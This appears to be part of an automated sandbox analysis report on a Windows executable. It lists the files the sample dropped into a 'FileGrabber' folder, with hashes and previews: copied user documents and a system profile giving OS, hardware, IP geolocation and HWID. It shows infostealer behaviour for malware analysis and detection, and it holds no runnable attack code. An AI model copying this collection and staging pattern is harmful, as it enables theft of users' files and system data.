SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\138727\FileGrabber\Downloads\JSDNGYCOWY.png

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690895772725941
Encrypted:	false
SSDEEP:	24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
MD5:	A002E80B55673139253599B753BDC01A
SHA1:	6AEEF831A5AAB9155AAABB52D173859E20A86932
SHA-256:	F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
SHA-512:	D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
Malicious:	false
Preview:	JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

C:\Users\user\AppData\Local\138727\FileGrabber\Downloads\KATAXZVCPS.docx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\138727\FileGrabber\Downloads\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\138727\FileGrabber\Downloads\LTKMYBSEYZ.png

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\138727\FileGrabber\Downloads\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\138727\FileGrabber\Downloads\UMMBDNEQBN.docx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\138727\FileGrabber\Downloads\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\138727\FileGrabber\Downloads\desktop.ini

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.5191090305155277
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
MD5:	3A37312509712D4E12D27240137FF377
SHA1:	30CED927E23B584725CF16351394175A6D2A9577
SHA-256:	B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
SHA-512:	DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

C:\Users\user\AppData\Local\138727\FileGrabber\Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\138727\FileGrabber\Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\138727\FileGrabber\Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\138727\Information.txt

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	651
Entropy (8bit):	4.170859367527534
Encrypted:	false
SSDEEP:	12:pYzZflTJCc6Te/z1MSYVmUpY7NunNYQA6r:psZflTJCc6ITYVI76Nk4
MD5:	7A776FCDF23D1EEA9FA8DCE5F707D91B
SHA1:	266CEF6A2433C92B713B555C910234DF2216408F
SHA-256:	DB18A68B3AFB36C5C45BB0AC69484E897E29F26B6F6D5B378C80787D05C44EA3
SHA-512:	FC39219249FFD4E44648A0BBBF52B9AAE2826D361432143D5953E61029EC753ABE609E917B99A882AFB0038A2685A8731B3817EA4372A92C7E88D2FCFE85B3F7
Malicious:	false
Preview:	==================================================. Operating system : Windows 10 Pro (64 Bit). PC user : 138727/user. ClipBoard : . Launch : C:\Users\user\Desktop\vEtDFkAZjO.exe. ==================================================. Screen resolution : 1280x1024. Current time : 31/12/2024 16:40:14. HWID : 66E942C318. ==================================================. CPU : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz. RAM : 4094MB. GPU : OP2CKCNS. ==================================================. IP Geolocation : 8.46.123.189 [United States]. Log Date : 12/31/2024 9:02. BSSID : 00:50:56:a7:21:15. ==================================================

C:\Users\user\AppData\Local\138727\InstalledSoftware.txt

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	241
Entropy (8bit):	5.130503875493093
Encrypted:	false
SSDEEP:	6:LO8aRH+39z3q9oH+3GIdKeSuPUOJlgPN3dwbFquqs3o:idRH+5+zd6uPUycUhW
MD5:	2CC99D7F6F68BDCF8752EF80DE256794
SHA1:	0EDB2377502E584BED20FE28001A964F6B8E66D9
SHA-256:	938DE1066B196DEDE78E7B82098436062335D3A9F568C6C65B15AC0E70509AEC
